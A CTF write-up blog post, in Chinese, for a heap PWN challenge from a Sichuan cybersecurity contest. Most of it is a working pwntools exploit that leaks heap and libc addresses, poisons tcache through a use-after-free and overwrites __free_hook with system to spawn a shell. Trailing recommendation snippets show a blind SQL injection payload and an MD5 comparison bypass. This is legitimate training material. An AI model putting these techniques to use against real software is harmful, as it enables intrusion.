四川省网络安全技能大赛 PWN一题wp

最新推荐文章于 2023-07-11 22:08:44 发布
最新推荐文章于 2023-07-11 22:08:44 发布
阅读量885 收藏 1
点赞数
分类专栏: CTF PWN 文章标签: 系统安全 安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/120135536
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

前言:没做过c++的题,也不知道怎么找漏洞,貌似这道题在id输入大量的数据,当数据爆满时遇到非法的内存数据,会让你重新输入,能够泄露出我们是堆和libc地址

貌似这道题解法是这,难点在泄露,当我们成功泄露出heap,可以利用uaf,进行edit成大堆块进而去打

exp:

from pwn import *
p=process('./classroom')
elf=ELF('./classroom')
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level='debug'
def add(idx,name):
	p.sendlineafter('>','1')
	p.sendlineafter('>',str(idx))
	p.sendlineafter('>',name)

def delete(idx):
	p.sendlineafter('>','2')
	p.sendlineafter('>',str(idx))

def edit(idx,name):
	p.sendlineafter('>','3')
	p.sendlineafter('>',str(idx))
	p.sendlineafter('>',name)


for i in range(2):
	add(i,'aaaa')

for i in range(2):
	delete(i)


p.sendlineafter('>','1')
p.sendlineafter('>','a'*0x1000)

p.sendline('1')

p.recvuntil('Welcome my student :')
heap=u64(p.recv(6).ljust(8,'\x00'))
tcache=heap-0x55a9d6062eb0+0x55a9d6051090
fake_chunk=heap-0x55b599377eb0+0x55b599377900
success('heap:'+hex(heap))

edit(1,p64(fake_chunk+8))

add(2,'aaaa')

add(3,p64(0x5a1))

delete(0)

delete(1)

edit(1,p64(fake_chunk+0x10))

add(4,'bbbb')
gdb.attach(p)
add(5,'ffff')
delete(5)

p.sendlineafter('>','1')
p.sendlineafter('>','a'*0x1000)
p.sendline('5')
p.recvuntil('Welcome my student :')
libc_base=u64(p.recv(6).ljust(8,'\x00'))+0x7ff826347000-0x7ff826532be0
success('libc_base:'+hex(libc_base))

delete(0)
delete(1)
edit(1,p64(libc_base+libc.sym['__free_hook']))
add(6,'/bin/sh\x00')
add(7,p64(libc_base+libc.sym['system']))

delete(6)


#gdb.attach(p)

p.interactive()

总结:没做过c++的题,c++需多机制都不是很明白,哎,太菜拉我

jsjsj11123
关注
专栏目录
2024第八届全国职工职业技能大赛“网络与信息安全管理员”河北省预选拔赛解析
Aluxian_的博客
08-03 776
2024第八届全国职工职业技能大赛“网络与信息安全管理员”某省选拔赛解析
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
世界技能大赛网络安全样题
07-13
自己找的绝对真实
2021年四川省大学生网络安全技能大赛EZSQL
woshilnp的博客
05-24 578
题目一 EZSQL 操作内容: 考点:MYSQL8新特性 fuzz之后发现,只能盲注,过滤了select,使用1' and (ascii(substr(database(),1,1)))>num --+可以盲注出数据库,但是后面就搞不动了 无select注入,使用的是table语句。 TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] 这个作用是列出表的全部内容,于是就可以利用这个语句来进行注入。 首先需要知
2021年四川省大学生信息安全技术大赛部分WP (四川省WP)
mumuzi的博客
09-06 3208
稍微有点阴间,但是血加成还是舒服 比如misc 500分的那个最后的部分、还有每道题的提交格式,嗐。 EasyWeb 第一个问问的是$fir == md5($fir) 弱比较,会把字符串类型转化成相同的,再进行比较。 绕过只需要找一个0e开头的并且md5之后也是0e开头,公网电脑一搜即可 payload:10.1.117.1:20000/?fir=0e215962017 回显得到TheFlagFi1e.php,访问之后发现叫输入password,查看源码说“md5加密,很安全” 依旧搜了之后发现,“ff
2021绿城杯pwn部分wp
eeeeeight的博客
09-29 1180
前言: 这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃) uafpwn: 释放之后指针未置零, 所以use after free乱打 from pwn import * context(log_level = 'debug', arch = 'amd64') # sh = process('./uaf_pwn') sh = remote('82.157.5.28', 52102) elf = ELF('./uaf_pwn') libc = elf.libc def add(siz
第五空间网络安全大赛pwn-bountyhunter
CHAWUCIREN1的博客
09-20 395
先运行一下 查看一下保护机制 开启了NX保护 丢入IDApro里面查看一下 查看一下vulnerable_function()函数 栈空间是144,但是可以读入的大小是0X200,常规的栈溢出题目 查看buf栈空间 shift+F12查看字符串 发现system和/bin/sh,构造payload ...
全国网络与信息安全管理职业技能大赛2020年题库
09-30
以上知识点涵盖了网络与信息安全管理大赛可能涉及的重要内容,包括网络协议、标准化、网络体系结构、网络安全法规、内容安全、营业场所安全,以及计算机网络的基本概念和通信技术。这些知识对于理解和处理网络安全...
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2462
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
2022年中职网络安全竞赛天津市赛任务九-PWN(2)
12-20
1.访问靶机 FSserver登录FTP,找到pwn1文件夹,下载内容进行作答,通过缓冲区溢出 对pwn1靶机进行破解,获取目标靶机 shell得到flag: Flagf}样例: flag{×xxx}。nc pwn1靶机ip 10000 2. 访问靶机FServer登录FTP,...
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门和PWN的学习,是入门指导。
网络安全学习笔记(5)——PWN实践
qq_42324049的博客
06-12 367
通过与ASCII码表对照,发现程序的加密逻辑。(在这没什么用,但如果需要逆向分析的话还是有一定的价值)‘shift+f12’,查看是否有flag,/bin/sh,system等关键信息。拿到文件,用步骤1,步骤2进行分析。其他的信息暂时还不了解具体应用场景,后续需要再去学习。NX enabled——开启数据执行防护,不能在栈堆执行shellcode。1.5运行python漏洞利用程序4.py,通过cat flag 命令拿到flag。输入一些数据,了解一下程序大致是干嘛的。通过提示可以大致了解到,这是一个。
长安“战疫“网络安全卫士守护赛--PWN
weixin_51055545的博客
01-09 365
今天早上定了闹钟起来干题,还没怎么睡醒 这里我把前两道pwn题给分析一下 pwn1 例行检查: 32位,没有开canary保护,没有pie,扔到IDA中 buf大小0x38,判断为栈溢出,还有后门,心中正在窃喜,长安这道签到题是真简单呀,但做了之后发现这里main函数最后的返回还应注意一下 调用完read之后,不是leave retn,而是多了一行lea esp ,[ecx-4],这里应注意一下,将ecx-4的地址给了esp,相当于返回到了ecx-4的地址,(注意lea 区别于mov,mov传送的是地址
2021年“绿城杯”网络安全大赛-PWN-GreentownNote
qq_43264813的博客
09-30 482
2021年“绿城杯”网络安全大赛-PWN-GreentownNote 题目名称:GreentownNote 题目内容:欢迎参加绿城杯~ 题目分值:200.0 题目难度:中等 相关附件:GreentownNote的附件3.txt 解题思路: 1.检查保护 保护全开 2.函数分析 题目只给了add,show,delete add() show() delete() 3.思路 (1)首先free泄露libc (2)构造heap srop 照题目环境2.27,应该是攻击free_hook,把它的值改成set_
网络安全入门之 BUUCTF Pwn - test your nc
Curren的博客
07-02 1926
`Pwn`类题目的入门题,我们需要获取目标机上的`flag`密钥。
西安邮电大学第三届网络安全技能大赛---PWN方向WP
tbsqigongzi的博客
11-14 2655
第三届西邮校赛
“卫士通”杯首届四川省高校网络攻防大赛文档及题目
tomato4的专栏
07-21 2960
 主办:四川团省委承办:成都信息工程学院团委 四川大学团委 一、       大赛简介网络在现今社会中扮演着越来越重要的作用,网络安全也随之变为越来越重要的问题。病毒、蠕虫、钓鱼、DDOS、僵尸网络、黑客攻击等事件层出不穷,给互联网络带来了巨大的损失,因此,培养高素质网络安全人才是我国互联网络安全、国家安全,资源保护急需解决的问题。首届四川省高校网络攻防大赛,其举办主要目的在于增加同学们对网络
0基础转行网络安全,选择pwn还是web?
最新发布
Nsy1010的博客
07-11 937
随着5G、工业互联网、人工智能等新兴领域技术的兴起,从而快速推动了各国从人人互联迈向万物互联的时代。奇安信董事长齐向东曾说过:“如果说5G带来了物联网和人工智能的风口,那么网络安全行业就是风口的平方——风口的风口。因此,有不少年轻人纷纷想加入网络安全行业,抢占先机。但由于网络安全行业的岗位很多,例如:信息安全工程师、渗透测试工程师、应急响应、逆向安全、溯源取证、安全架构师、恶意软件分析师等等,导致很多人不知道从哪个方向学起。
2022福建移动杯网络安全大赛:实战CTF竞赛规程详解
2022年福建移动杯网络安全技能大赛是一项由中国移动通信集团福建有限公司主办,福建福诺移动通信技术有限公司、福建信息职业技术学院、福建船政交通职业学院和福建华众互联网科技有限公司共同承办的赛事。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值